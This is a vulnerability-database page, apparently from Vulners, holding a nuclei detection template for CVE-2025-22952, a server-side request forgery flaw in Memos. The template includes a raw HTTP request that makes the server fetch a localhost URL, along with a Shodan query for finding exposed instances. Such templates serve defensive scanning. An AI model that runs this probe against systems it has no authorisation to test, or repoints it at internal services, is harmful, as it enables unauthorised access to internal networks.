Lucene search
K

Elestio Memos <= v0.24.0 - Server-Side Request Forgery

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Elestio Memos v0.23.0 has critical SSRF vulnerability due to insufficient URL validation.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-22952
27 Feb 202521:59
circl
CNNVD
Memos 安全漏洞
27 Feb 202500:00
cnnvd
CVE
CVE-2025-22952
27 Feb 202500:00
cve
Cvelist
CVE-2025-22952
27 Feb 202500:00
cvelist
Github Security Blog
Memos Server-Side Request Forgery (SSRF)
27 Feb 202521:32
github
NVD
CVE-2025-22952
27 Feb 202520:16
nvd
OSV
GHSA-WFXG-V3J4-7QMJ Memos Server-Side Request Forgery (SSRF)
27 Feb 202521:32
osv
OSV
GO-2025-3492 Memos Server-Side Request Forgery (SSRF) in github.com/usememos/memos
3 Mar 202519:22
osv
OSV
OPENSUSE-SU-2025:14889-1 govulncheck-vulndb-0.0.20250312T181707-1.1 on GA media
13 Mar 202500:00
osv
Positive Technologies
PT-2025-6100
10 Feb 202500:00
ptsecurity
Rows per page
id: CVE-2025-22952

info:
  name: Elestio Memos <= v0.24.0 - Server-Side Request Forgery
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    elestio memos v0.23.0 is vulnerable to Server-Side Request Forgery (SSRF) due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.
  impact: |
    Unauthenticated attackers can exploit SSRF vulnerabilities to access internal services, bypass network security controls, and potentially retrieve sensitive information from internal systems.
  remediation: |
    Upgrade to Memos version 0.24.1 or later that properly validates and restricts URL access.
  reference:
    - https://github.com/advisories/GHSA-wfxg-v3j4-7qmj
    - https://elest.io/open-source/memos
    - https://github.com/usememos/memos
    - https://github.com/usememos/memos/issues/4413
    - https://github.com/usememos/memos/pull/4428
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-22952
    cwe-id: CWE-918
    epss-score: 0.02818
    epss-percentile: 0.8483
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-1924700661
  tags: cve,cve2025,elestio,memos,ssrf,oast,vuln,vkev

http:
  - raw:
      - |
        GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'localhost:13042'
          - 'connect: connection refused'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 500
# digest: 4a0a0047304502210091104d57b41ee7926c1f48502c49dfda1795d17c19b917c6679a5b14c940268802202878d1a3c6feb5a0d3f274b1e7ed46c8ab3d2441ff1f3573a6046e6f1bb4014a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
EPSS0.02818
SSVC
27